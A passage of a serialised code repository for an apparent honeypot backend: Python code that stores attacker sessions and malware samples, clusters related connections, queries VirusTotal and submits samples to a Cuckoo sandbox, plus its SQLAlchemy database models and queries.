net_cache[network.id]\n\t\t\t\telse:\n\t\t\t\t\tnetwork.nb_firstconns = 0\n\t\t\t\t\t\n\t\t\t\tprint \"Net \" + str(network.id) + \": \" + str(network.nb_firstconns)\n\t\n\t@db_wrapper\n\tdef put_session(self, session):\n\t\t\n\t\tconnhash = self.calc_connhash(session[\"stream\"]).encode(\"hex\")\n\t\t\n\t\tbackend_user = self.session.query(User).filter(\n\t\t\tUser.username == session[\"backend_username\"]).first()\n\t\t\n\t\tconn = Connection(ip=session[\"ip\"], user=session[\"user\"],\n\t\t\tdate=session[\"date\"], password=session[\"pass\"],\n\t\t\tstream=json.dumps(session[\"stream\"]),\n\t\t\tconnhash=connhash, backend_user_id=backend_user.id)\n\t\t\n\t\tconn.user     = filter_ascii(conn.user)\n\t\tconn.password = filter_ascii(conn.password)\n\t\t\n\t\tif self.do_ip_to_asn_resolution:\n\t\t\trange = self.get_ip_range(conn.ip)\n\t\t\tif range:\n\t\t\t\tconn.country = range.country\n\t\t\t\tconn.city    = range.city\n\t\t\t\tconn.lat     = range.latitude\n\t\t\t\tconn.lon     = range.longitude\n\t\t\t\tconn.asn     = range.asn\n\t\t\n\t\tself.session.add(conn)\n\t\tself.session.flush() # to get id\n\t\t\n\t\tnetwork_id = None\n\t\t\n\t\tsamples = []\n\t\turls    = []\n\t\tfor sample_json in session[\"samples\"]:\n\t\t\t# Ignore junk - may clean up the db a bit\n\t\t\tif sample_json[\"length\"] < 2000:\n\t\t\t\tcontinue\n\n\t\t\tsample, url = self.create_url_sample(sample_json)\n\t\t\t\n\t\t\tif sample:\n\t\t\t\tif network_id == None and sample.network_id != None:\n\t\t\t\t\tnetwork_id = sample.network_id\n\t\t\t\tsamples.append(sample)\n\t\t\t\t\n\t\t\tif url:\n\t\t\t\tif network_id == None and url.network_id != None:\n\t\t\t\t\tnetwork_id = url.network_id\n\t\t\t\tconn.urls.append(url)\n\t\t\t\turls.append(url)\n\n\t\t# Find previous connections\n\t\t# A connection is associated when:\n\t\t#  - same honeypot/user\n\t\t#  - connection happened as long as 120s before\n\t\t#  - same client ip OR same username/password combo\n\t\tassoc_timediff        = 120\n\t\tassoc_timediff_sameip = 3600\n\t\t\n\t\tprevious_conns = (self.session.query(Connection).\n\t\t\t\tfilter(\n\t\t\t\tor_(\n\t\t\t\t\tand_(\n\t\t\t\t\t\tConnection.date > (conn.date - assoc_timediff),\n\t\t\t\t\t\tConnection.user == conn.user,\n\t\t\t\t\t\tConnection.password == conn.password\n\t\t\t\t\t),\n\t\t\t\t\tand_(\n\t\t\t\t\t\tConnection.date > (conn.date - assoc_timediff_sameip),\n\t\t\t\t\t\tConnection.ip == conn.ip\n\t\t\t\t\t)\n\t\t\t\t),\n\t\t\t\tConnection.backend_user_id == conn.backend_user_id,\n\t\t\t\tConnection.id != conn.id).all())\n\n\t\tfor prev in previous_conns:\n\t\t\tif network_id == None and prev.network_id != None:\n\t\t\t\tnetwork_id = prev.network_id\n\t\t\tconn.conns_before.append(prev)\n\n\t\t# Check connection against all tags\n\t\ttags = self.session.query(Tag).all()\n\t\tfor tag in tags:\n\t\t\tjson_obj = conn.json(depth = 0)\n\t\t\tjson_obj[\"text_combined\"] = filter_ascii(json_obj[\"text_combined\"])\n\t\t\tif simple_eval(tag.code, names=json_obj) == True:\n\t\t\t\tself.db.link_conn_tag(conn.id, tag.id)\n\n\t\t# Only create new networks for connections with urls or associtaed conns,\n\t\t# to prevent the creation of thousands of networks\n\t\t# NOTE: only conns with network == NULL will get their network updated\n\t\t#       later so whe should only create a network where we cannot easily\n\t\t#       change it later\n\t\thaslogin = conn.user != None and conn.user != \"\"\n\t\tif (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin:\n\t\t\tprint(\" --- create network --- \")\n\t\t\tnetwork_id = self.create_network().id\n\n\t\t# Update network on self\n\t\tconn.network_id = network_id\n\n\t\t# Update network on all added Urls\n\t\tfor url in urls:\n\t\t\tif url.network_id == None:\n\t\t\t\turl.network_id = network_id\n\n\t\t# Update network on all added Samples\n\t\tfor sample in samples:\n\t\t\tif sample.network_id == None:\n\t\t\t\tsample.network_id = network_id\n\n\t\t# Update network on all previous connections withut one\n\t\tif network_id != None:\n\t\t\tfor prev in previous_conns:\n\t\t\t\tif prev.network_id == None:\n\t\t\t\t\tprev.network_id = network_id\n\t\t\t\t\t\n\t\t\t\t\t# Update number of first conns on network\n\t\t\t\t\tif len(prev.conns_before) == 0:\n\t\t\t\t\t\tconn.network.nb_firstconns += 1\n\t\t\n\t\tself.session.flush()\n\n\t\t# Check for Malware type\n\t\t# \tonly if our network exists AND has no malware associated\n\t\tif conn.network != None and conn.network.malware == None:\n\t\t\t# Find connections with similar connhash\n\t\t\tsimilar_conns = (self.session.query(Connection)\n\t\t\t\t.filter(func.length(Connection.connhash) == len(connhash))\n\t\t\t\t.all())\n\n\t\t\tmin_sim  = 2\n\t\t\tmin_conn = None\n\t\t\tfor similar in similar_conns:\n\t\t\t\tif similar.network_id != None:\n\t\t\t\t\tc1  = connhash.decode(\"hex\")\n\t\t\t\t\tc2  = similar.connhash.decode(\"hex\")\n\t\t\t\t\tsim = self.calc_connhash_similiarity(c1, c2)\n\t\t\t\t\tif sim < min_sim and similar.network.malware != None:\n\t\t\t\t\t\tmin_sim  = sim\n\t\t\t\t\t\tmin_conn = similar\n\n\t\t\t# 0.9: 90% or more words in session are equal\n\t\t\t#\tthink this is probably the same kind of malware\n\t\t\t#\tdoesn't need to be the same botnet though!\n\t\t\tif min_sim < 0.9:\n\t\t\t\tconn.network.malware = min_conn.network.malware\n\t\t\telse:\n\t\t\t\tconn.network.malware = Malware()\n\t\t\t\tconn.network.malware.name = random.choice(ANIMAL_NAMES)\n\t\t\t\t\n\t\t\t\tself.session.add(conn.network.malware)\n\t\t\t\tself.session.flush()\n\t\t\n\t\t# Update network number of first connections\n\t\tif len(previous_conns) == 0 and conn.network_id != None:\n\t\t\tconn.network.nb_firstconns += 1\n\n\t\treturn conn.json(depth=1)\n\t\t\n\t@db_wrapper\n\tdef create_network(self):\n\t\tnet = Network()\n\t\tself.session.add(net)\n\t\tself.session.flush()\n\t\treturn net\n\n\tdef create_url_sample(self, f):\n\t\turl = self.session.query(Url).filter(Url.url==f[\"url\"]).first()\n\t\tif url == None:\n\t\t\turl_ip      = None\n\t\t\turl_asn     = None\n\t\t\turl_country = None\n\t\t\t\n\t\t\tif self.do_ip_to_asn_resolution:\n\t\t\t\turl_ip, url_range = self.get_url_info(f[\"url\"])\n\t\t\t\tif url_range:\n\t\t\t\t\turl_asn     = url_range.asn_id\n\t\t\t\t\turl_country = url_range.country\n\t\t\t\n\t\t\turl = Url(url=f[\"url\"], date=f[\"date\"], ip=url_ip, asn_id=url_asn, country=url_country)\n\t\t\tself.session.add(url)\n\t\t\n\t\tif f[\"sha256\"] != None:\n\t\t\tsample = self.session.query(Sample).filter(Sample.sha256 == f[\"sha256\"]).first()\n\t\t\tif sample == None:\n\t\t\t\tresult = None\n\t\t\t\ttry:\n\t\t\t\t\tif self.vt != None:\n\t\t\t\t\t\tvtobj  = self.vt.query_hash_sha256(f[\"sha256\"])\n\t\t\t\t\t\tif vtobj:\n\t\t\t\t\t\t\tresult = str(vtobj[\"positives\"]) + \"/\" + str(vtobj[\"total\"]) + \" \" + self.vt.get_best_result(vtobj)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\t\t\t\tsample = Sample(sha256=f[\"sha256\"], name=f[\"name\"], length=f[\"length\"],\n\t\t\t\t\tdate=f[\"date\"], info=f[\"info\"], result=result)\n\t\t\t\tself.session.add(sample)\n\t\t\n\t\t\tif sample.network_id != None and url.network_id == None:\n\t\t\t\turl.network_id = sample.network_id\n\t\t\n\t\t\tif sample.network_id == None and url.network_id != None:\n\t\t\t\tsample.network_id = url.network_id\n\t\telse:\n\t\t\tsample = None\n\t\t\n\t\turl.sample = sample\n\t\t\n\t\treturn sample, url\n\n\t@db_wrapper\n\tdef put_sample(self, data):\n\t\tsha256 = hashlib.sha256(data).hexdigest()\n\t\tself.db.put_sample_data(sha256, data)\n\t\tif config.get(\"cuckoo_enabled\"):\n\t\t\tself.cuckoo.upload(os.path.join(config.get(\"sample_dir\"), sha256), sha256)\n\t\telif config.get(\"submit_to_vt\"):\n\t\t\tself.vt.upload_file(os.path.join(config.get(\"sample_dir\"), sha256), sha256)\n\n\t@db_wrapper\n\tdef update_vt_result(self, sample_sha):\n\t\tsample = self.session.query(Sample).filter(Sample.sha256 == sample_sha).first()\n\t\tif sample:\n\t\t\tvtobj = self.vt.query_hash_sha256(sample_sha)\n\t\t\tif vtobj:\n\t\t\t\tsample.result = str(vtobj[\"positives\"]) + \"/\" + str(vtobj[\"total\"]) + \" \" + self.vt.get_best_result(vtobj)\n\t\t\t\treturn sample.json(depth=1)\n\t\treturn None\n\n"
  },
  {
    "path": "backend/cuckoo.py",
    "content": "import json\nimport os\ntry:\n    from urllib.parse import urlparse, urljoin\nexcept ImportError:\n    from urlparse import urlparse, urljoin\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom util.config import config\n\ntry:\n    import urllib3\n    urllib3.disable_warnings()\nexcept (AttributeError, ImportError):\n    pass\n\nclass Cuckoo():\n\n    def __init__(self, config):\n        self.url_base = config.get(\"cuckoo_url_base\")\n        self.api_user = config.get(\"cuckoo_user\")\n        self.api_passwd = config.get(\"cuckoo_passwd\")\n        self.cuckoo_force = config.get(\"cuckoo_force\")\n\n    def upload(self, path, name):\n\n        if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False:\n            print(\"Sending file to Cuckoo\")\n            self.postfile(path, name)\n\n    def cuckoo_check_if_dup(self, sha256):\n        \"\"\"\n        Check if file already was analyzed by cuckoo\n        \"\"\"\n        try:\n            print(\"Looking for tasks for: {}\".format(sha256))\n            res = requests.get(urljoin(self.url_base, \"/files/view/sha256/{}\".format(sha256)),\n                verify=False,\n                auth=HTTPBasicAuth(self.api_user,self.api_passwd),\n                timeout=60)\n            if res and res.ok and res.status_code == 200:\n                print(\"Sample found in Sandbox, with ID: {}\".format(res.json().get(\"sample\", {}).get(\"id\", 0)))\n                return True\n            else:\n                return False\n        except Exception as e:\n            print(e)\n\n        return False\n\n    def postfile(self, artifact, fileName):\n        \"\"\"\n        Send a file to Cuckoo\n        \"\"\"\n        files = {\"file\": (fileName, open(artifact, \"rb\").read())}\n        try:\n            res = requests.post(urljoin(self.url_base, \"tasks/create/file\").encode(\"utf-8\"), files=files, auth=HTTPBasicAuth(\n                            self.api_user,\n                            self.api_passwd\n                        ),\n                        verify=False)\n            if res and res.ok:\n                print(\"Cuckoo Request: {}, Task created with ID: {}\".format(res.status_code, res.json()[\"task_id\"]))\n            else:\n                print(\"Cuckoo Request failed: {}\".format(res.status_code))\n        except Exception as e:\n            print(\"Cuckoo Request failed: {}\".format(e))\n        return\n\n\n    def posturl(self, scanUrl):\n        \"\"\"\n        Send a URL to Cuckoo\n        \"\"\"\n        data = {\"url\": scanUrl}\n        try:\n            res = requests.post(urljoin(self.url_base, \"tasks/create/url\").encode(\"utf-8\"), data=data, auth=HTTPBasicAuth(\n                            self.api_user,\n                            self.api_passwd\n                        ),\n                        verify=False)\n            if res and res.ok:\n                print(\"Cuckoo Request: {}, Task created with ID: {}\".format(res.status_code, res.json()[\"task_id\"]))\n            else:\n                print(\"Cuckoo Request failed: {}\".format(res.status_code))\n        except Exception as e:\n            print(\"Cuckoo Request failed: {}\".format(e))\n        return\n"
  },
  {
    "path": "backend/db.py",
    "content": "import time\nimport json\nimport sqlalchemy\nimport random\n\nfrom decorator import decorator\n\nfrom sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index\n\nfrom sqlalchemy.sql import select, join, insert, text\nfrom sqlalchemy.orm import relationship, sessionmaker, scoped_session\nfrom sqlalchemy.pool import QueuePool\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom util.config import config\n\nis_sqlite = \"sqlite://\" in config.get(\"sql\")\n\nprint(\"Creating/Connecting to DB\")\n\n@decorator\ndef db_wrapper(func, *args, **kwargs):\n\tself = args[0]\n\tif self.session:\n\t\treturn func(*args, **kwargs)\n\telse:\n\t\tself.db      = get_db()\n\t\tself.session = self.db.sess\n\n\t\ttry:\n\t\t\treturn func(*args, **kwargs)\n\t\t\tself.session.commit()\n\t\t\tself.session.flush()\n\t\tfinally:\n\t\t\tself.db.end()\n\t\t\tself.db = None\n\t\t\tself.session = None\n\ndef now():\n\treturn int(time.time())\n\ndef filter_ascii(string):\n\tif string == None:\n\t\tstring = \"\"\n\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \"\\r\\n \")\n\treturn string\n\nBase = declarative_base()\n\n# n to m relation connection <-> url\nconns_urls = Table('conns_urls', Base.metadata,\n\tColumn('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_url', None, ForeignKey('urls.id'), primary_key=True, index=True),\n)\n\n# n to m relation connection <-> tag\nconns_tags = Table('conns_tags', Base.metadata,\n\tColumn('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_tag', None, ForeignKey('tags.id'), primary_key=True, index=True),\n)\n\n# n to m relationship connection <-> connection (associates)\nconns_conns = Table('conns_assocs', Base.metadata,\n\tColumn('id_first', None, ForeignKey('conns.id'), primary_key=True, index=True),\n\tColumn('id_last',  None, ForeignKey('conns.id'), primary_key=True, index=True),\n)\n\nclass IPRange(Base):\n\t__tablename__ = \"ipranges\"\n\t\n\tip_min    = Column(\"ip_min\",     BigInteger, primary_key=True)\n\tip_max    = Column(\"ip_max\",     BigInteger, primary_key=True)\n\t\n\tcidr      = Column(\"cidr\",       String(20), unique=True)\n\tcountry   = Column(\"country\",    String(3))\n\tregion    = Column(\"region\",     String(128))\n\tcity      = Column(\"city\",       String(128))\n\tzipcode   = Column(\"zipcode\",    String(30))\n\ttimezone  = Column(\"timezone\",   String(8))\n\t\n\tlatitude  = Column(\"latitude\",   Float)\n\tlongitude = Column(\"longitude\",  Float)\n\t\n\tasn_id    = Column('asn', None, ForeignKey('asn.asn'))\n\tasn       = relationship(\"ASN\", back_populates=\"ipranges\")\n\nclass User(Base):\n\t__tablename__ = 'users'\n\n\tid       = Column('id', Integer, primary_key=True)\n\tusername = Column('username', String(32), unique=True, index=True)\n\tpassword = Column('password', String(64))\n\n\tconnections = relationship(\"Connection\", back_populates=\"backend_user\")\n\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"username\": self.username\n\t\t}\n\t\t\nclass Network(Base):\n\t__tablename__ = 'network'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\n\tsamples     = relationship(\"Sample\",     back_populates=\"network\")\n\turls        = relationship(\"Url\",        back_populates=\"network\")\n\tconnections = relationship(\"Connection\", back_populates=\"network\")\n\t\n\tnb_firstconns = Column('nb_firstconns', Integer, default=0)\n\n\tmalware_id  = Column('malware', None, ForeignKey('malware.id'))\n\tmalware     = relationship(\"Malware\", back_populates=\"networks\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"id\":          self.id,\n\t\t\t\"samples\":     len(self.samples)     if depth == 0 else map(lambda i: i.sha256, self.samples),\n\t\t\t\"urls\":        len(self.urls)        if depth == 0 else map(lambda i: i.url, self.urls),\n\t\t\t\"connections\": len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections),\n\t\t\t\"firstconns\":  self.nb_firstconns,\n\t\t\t\"malware\":     self.malware.json(depth=0)\n\t\t}\n\nclass Malware(Base):\n\t__tablename__ = 'malware'\n\n\tid       = Column('id', Integer, primary_key=True)\n\tname     = Column('name', String(32))\n\tnetworks = relationship(\"Network\", back_populates=\"malware\")\n\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"id\":          self.id,\n\t\t\t\"name\":        self.name,\n\t\t\t\"networks\":    map(lambda i: i.id if depth == 0 else i.json(), self.networks)\n\t\t}\n\t\n\nclass ASN(Base):\n\t__tablename__ = 'asn'\n\t\n\tasn = Column('asn', BigInteger, primary_key=True)\n\tname = Column('name', String(64))\n\treg = Column('reg', String(32))\n\tcountry = Column('country', String(3))\n\t\n\turls = relationship(\"Url\", back_populates=\"asn\")\n\tconnections = relationship(\"Connection\", back_populates=\"asn\")\n\tipranges = relationship(\"IPRange\", back_populates=\"asn\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"asn\": self.asn,\n\t\t\t\"name\": self.name,\n\t\t\t\"reg\": self.reg,\n\t\t\t\"country\": self.country,\n\t\t\t\n\t\t\t\"urls\": map(lambda url : url.url if depth == 0\n\t\t\t   else url.json(depth - 1), self.urls[:10]),\n\t\t\t\n\t\t\t\"connections\": None if depth == 0 else map(lambda connection :\n                connection.json(depth - 1), self.connections[:10])\n\t\t}\n\nclass Sample(Base):\n\t__tablename__ = 'samples'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\tsha256 = Column('sha256', String(64), unique=True, index=True)\n\tdate = Column('date', Integer)\n\tname = Column('name', String(32))\n\tfile = Column('file', String(512))\n\tlength = Column('length', Integer)\n\tresult = Column('result', String(32))\n\tinfo = Column('info', Text())\n\t\n\turls = relationship(\"Url\", back_populates=\"sample\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork     = relationship(\"Network\", back_populates=\"samples\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"sha256\": self.sha256,\n\t\t\t\"date\": self.date,\n\t\t\t\"name\": self.name,\n\t\t\t\"length\": self.length,\n\t\t\t\"result\": self.result,\n\t\t\t\"info\": self.info,\n\t\t\t\"urls\": len(self.urls) if depth == 0 else map(lambda url :\n                url.json(depth - 1), self.urls),\n\t\t\t\"network\": self.network_id if depth == 0 else self.network.json()\n\t\t}\n\t\nclass Connection(Base):\n\t__tablename__ = 'conns'\n\t\n\tid = Column('id', Integer, primary_key=True)\n\tip = Column('ip', String(16))\n\tdate = Column('date', Integer, index=True)\n\tuser = Column('user', String(16))\n\tpassword = Column('pass', String(16))\n\tconnhash = Column('connhash', String(256), index=True)\n\n\tstream = Column('text_combined', Text())\n\n\tasn_id = Column('asn', None, ForeignKey('asn.asn'), index=True)\n\tasn = relationship(\"ASN\", back_populates=\"connections\")\n\n\tbackend_user_id = Column('backend_user_id', None, ForeignKey('users.id'), index=True)\n\tbackend_user = relationship(\"User\", back_populates=\"connections\")\n\n\tipblock   = Column('ipblock', String(32))\n\tcountry   = Column('country', String(3))\n\tcity      = Column('city',    String(32))\n\tlon       = Column('lon',     Float)\n\tlat       = Column('lat',     Float)\n\t\n\turls    = relationship(\"Url\", secondary=conns_urls, back_populates=\"connections\")\n\ttags    = relationship(\"Tag\", secondary=conns_tags, back_populates=\"connections\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork     = relationship(\"Network\", back_populates=\"connections\")\n\t\n\tconns_before = relationship(\"Connection\", secondary=conns_conns,\n\t\t\tback_populates=\"conns_after\", \n            primaryjoin=(conns_conns.c.id_last==id),\n            secondaryjoin=(conns_conns.c.id_first==id))\n\tconns_after  = relationship(\"Connection\", secondary=conns_conns,\n\t\t\tback_populates=\"conns_before\", \n            primaryjoin=(conns_conns.c.id_first==id),\n            secondaryjoin=(conns_conns.c.id_last==id))\n\t\n\tdef json(self, depth=0):\n\t\t\n\t\tstream = None\n\t\t\n\t\tif depth > 0:\n\t\t\ttry:\n\t\t\t\tstream = json.loads(self.stream)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\t# Fix Truncated JSON ...\n\t\t\t\t\ts = self.stream[:self.stream.rfind(\"}\")] + \"}]\"\n\t\t\t\t\tstream = json.loads(s)\n\t\t\t\texcept:\n\t\t\t\t\tstream = []\n\t\t\n\t\treturn {\n\t\t\t\"id\":   self.id,\n\t\t\t\"ip\":   self.ip,\n\t\t\t\"date\": self.date,\n\t\t\t\"user\": self.user,\n\t\t\t\"password\": self.password,\n\t\t\t\"connhash\": self.connhash,\n\t\t\t\"stream\": stream,\n\t\t\t\n\t\t\t\"network\": self.network_id if depth == 0 else (self.network.json() if self.network != None else None),\n\t\t\t\n\t\t\t\"asn\": None if self.asn == None else self.asn.json(0),\n\t\t\t\n\t\t\t\"ipblock\":   self.ipblock,\n\t\t\t\"country\":   self.country,\n\t\t\t\"city\":      self.city,\n\t\t\t\"longitude\": self.lon,\n\t\t\t\"latitude\":  self.lat,\n\n\t\t\t\"conns_before\": map(lambda conn : conn.id if depth == 0\n\t\t\t\telse conn.json(depth - 1), self.conns_before),\n\t\t\t\"conns_after\": map(lambda conn : conn.id if depth == 0\n\t\t\t\telse conn.json(depth - 1), self.conns_after),\n\n\t\t\t\"backend_user\": self.backend_user.username,\n\t\t\t\n\t\t\t\"urls\": len(self.urls) if depth == 0 else map(lambda url :\n\t\t\t   url.json(depth - 1), self.urls),\n\n\t\t\t\"tags\": len(self.tags) if depth == 0 else map(lambda tag :\n\t\t\t   tag.json(depth - 1), self.tags),\n\t\t}\n\nIndex('idx_conn_user_pwd', Connection.user, Connection.password)\n\t\nclass Url(Base):\n\t__tablename__ = 'urls'\n\t\n\tid   = Column('id', Integer, primary_key=True)\n\turl  = Column('url', String(256), unique=True, index=True)\n\tdate = Column('date', Integer)\n\t\n\tsample_id = Column('sample', None, ForeignKey('samples.id'), index=True)\n\tsample    = relationship(\"Sample\", back_populates=\"urls\")\n\t\n\tnetwork_id  = Column('network', None, ForeignKey('network.id'), index=True)\n\tnetwork     = relationship(\"Network\", back_populates=\"urls\")\n\t\n\tconnections = relationship(\"Connection\", secondary=conns_urls, back_populates=\"urls\")\n\t\n\tasn_id = Column('asn', None, ForeignKey('asn.asn'))\n\tasn = relationship(\"ASN\", back_populates=\"urls\")\n\t\n\tip  = Column('ip', String(32))\n\tcountry = Column('country', String(3))\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"url\": self.url,\n\t\t\t\"date\": self.date,\n\t\t\t\"sample\": None if self.sample == None else \n\t\t\t\t(self.sample.sha256 if depth == 0\n\t\t\t\t\telse self.sample.json(depth - 1)),\n\t\t\t\t\n\t\t\t\"connections\": len(self.connections) if depth == 0 else map(lambda connection :\n\t\t\t\t\t  connection.json(depth - 1), self.connections),\n\t\t\t\n\t\t\t\"asn\": None if self.asn == None else \n\t\t\t\t(self.asn.asn if depth == 0\n\t\t\t\t\telse self.asn.json(depth - 1)),\n\t\t\t\t\n\t\t\t\"ip\": self.ip,\n\t\t\t\"country\": self.country,\n\t\t\t\"network\": self.network_id if depth == 0 else self.network.json()\n\t\t}\n\nclass Tag(Base):\n\t__tablename__ = 'tags'\n\t\n\tid   = Column('id', Integer, primary_key=True)\n\tname = Column('name', String(32), unique=True)\n\tcode = Column('code', String(256))\n\n\tconnections = relationship(\"Connection\", secondary=conns_tags, back_populates=\"tags\")\n\t\n\tdef json(self, depth=0):\n\t\treturn {\n\t\t\t\"name\": self.name,\n\t\t\t\"code\": self.code,\n\t\t\t\t\n\t\t\t\"connections\": None if depth == 0 else map(lambda connection :\n                connection.json(depth - 1), self.connections)\n\t\t}\n\t\n\t\nsamples = Sample.__table__ \nconns   = Connection.__table__\nurls    = Url.__table__\ntags    = Tag.__table__\n\neng = None\n\nif is_sqlite:\n\teng = sqlalchemy.create_engine(config.get(\"sql\"),\n\t\t\t\t\t\t\t\tpoolclass=QueuePool,\n\t\t\t\t\t\t\t\tpool_size=1,\n\t\t\t\t\t\t\t\tmax_overflow=20,\n\t\t\t\t\t\t\t\tconnect_args={'check_same_thread': False})\nelse:\n\teng = sqlalchemy.create_engine(config.get(\"sql\"),\n\t\t\t\t\t\t\t\tpoolclass=QueuePool,\n\t\t\t\t\t\t\t\tpool_size=config.get(\"max_db_conn\"),\n\t\t\t\t\t\t\t\tmax_overflow=config.get(\"max_db_conn\"))\n\nBase.metadata.create_all(eng)\n\ndef get_db():\n\treturn DB(scoped_session(sessionmaker(bind=eng)))\n\ndef delete_everything():\n\tspare_tables = [\"users\", \"asn\", \"ipranges\"]\n\n\teng.execute(\"SET FOREIGN_KEY_CHECKS=0;\")\n\tfor table in Base.metadata.tables.keys():\n\t\tif table in spare_tables:\n\t\t\tcontinue\n\t\tsql_text = \"DELETE FROM \" + table + \";\"\n\t\tprint sql_text\n\t\teng.execute(sql_text)\n\teng.execute(\"SET FOREIGN_KEY_CHECKS=1;\")\n\nclass DB:\n\t\n\tdef __init__(self, sess):\n\t\tself.sample_dir    = config.get(\"sample_dir\")\n\t\tself.limit_samples = 32\n\t\tself.limit_urls    = 32\n\t\tself.limit_conns   = 32\n\t\tself.sess          = sess\n\n\tdef end(self):\n\t\ttry:\n\t\t\tself.sess.commit()\n\t\tfinally:\n\t\t\tself.sess.remove()\n\n\t# INPUT\n\t\n\tdef put_sample_data(self, sha256, data):\n\t\tfile = self.sample_dir + \"/\" + sha256\n\t\tfp = open(file, \"wb\")\n\t\tfp.write(data)\n\t\tfp.close()\n\t\t\n\t\tself.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file))\n\t\t\t\n\tdef put_sample_result(self, sha256, result):\n\t\tself.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result))\n\n\tdef put_url(self, url, date, url_ip, url_asn, url_country):\n\t\tex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone()\n\t\tif ex_url:\n\t\t\treturn ex_url[\"id\"]\n\t\telse:\n\t\t\treturn self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0]\n\n\tdef put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash):\n\t\treturn self.sess.execute(conns.insert().values((None, ip, date, user, password, text_combined, asn, block, country))).inserted_primary_key[0]\n\n\tdef put_sample(self, sha256, name, length, date, info, result):\n\t\tex_sample = self.get_sample(sha256).fetchone()\n\t\tif ex_sample:\n\t\t\treturn ex_sample[\"id\"]\n\t\telse:\n\t\t\treturn self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0]\n\n\tdef link_conn_url(self, id_conn, id_url):\n\t\tself.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url))\n\n\tdef link_url_sample(self, id_url, id_sample):\n\t\tself.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample))\n\n\tdef link_conn_tag(self, id_conn, id_tag):\n\t\tself.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag))\n\n\t# OUTPUT\n\t\n\tdef get_conn_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM conns\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\t\n\tdef get_sample_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM samples\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\t\n\tdef get_url_count(self):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(id) as count FROM urls\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q)).fetchone()[\"count\"]\n\n\tdef search_sample(self, q):\n\t\tq = \"%\" + q + \"%\"\n\t\treturn self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples))\n\n\tdef search_url(self, q):\n\t\tsearch = \"%\" + q + \"%\"\n\t\tq = \"\"\"\n\t\tSELECT urls.url as url, urls.date as date, samples.sha256 as sample\n\t\tFROM urls\n\t\tLEFT JOIN samples on samples.id = urls.sample\n\t\tWHERE urls.url LIKE :search\n\t\tLIMIT :limit\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"search\": search, \"limit\": self.limit_urls})\n\t\n\tdef get_url(self, url):\n\t\tq = \"\"\"\n\t\tSELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id\n\t\tFROM urls\n\t\tLEFT JOIN samples on samples.id = urls.sample\n\t\tWHERE urls.url = :search\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"search\": url})\n\t\t\n\tdef get_url_conns(self, id_url):\n\t\tq = \"\"\"\n\t\tSELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date\n\t\tFROM conns_urls\n\t\tLEFT JOIN conns on conns.id = conns_urls.id_conn\n\t\tWHERE conns_urls.id_url = :id_url\n\t\tORDER BY conns.date DESC\n\t\tLIMIT :limit\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"id_url\": id_url, \"limit\" : self.limit_samples})\n\t\n\tdef get_url_conns_count(self, id_url):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns_urls.id_conn) as count\n\t\tFROM conns_urls\n\t\tWHERE conns_urls.id_url = :id_url\n\t\t\"\"\"\t\t\n\t\treturn self.sess.execute(text(q), {\"id_url\": id_url})\n\n\tdef get_sample_stats(self, date_from = 0):\n\t\tdate_from = 0\n\t\tlimit     = self.limit_samples\n\t\tq = \"\"\"\n\t\tselect\n\t\t\tsamples.name as name, samples.sha256 as sha256,\n\t\t\tCOUNT(samples.id) as count, MAX(conns.date) as lastseen,\n\t\t\tsamples.length as length, samples.result as result\n\t\tfrom conns_urls\n\t\tINNER JOIN conns on conns_urls.id_conn = conns.id\n\t\tINNER JOIN urls on conns_urls.id_url = urls.id\n\t\tINNER JOIN samples on urls.sample = samples.id\n\t\tWHERE conns.date > :from\n\t\tGROUP BY samples.id\n\t\tORDER BY count DESC\n\t\tLIMIT :limit\"\"\"\n\t\treturn self.sess.execute(text(q), {\"from\": date_from, \"limit\": self.limit_samples})\n\n\tdef history_global(self, fromdate, todate, 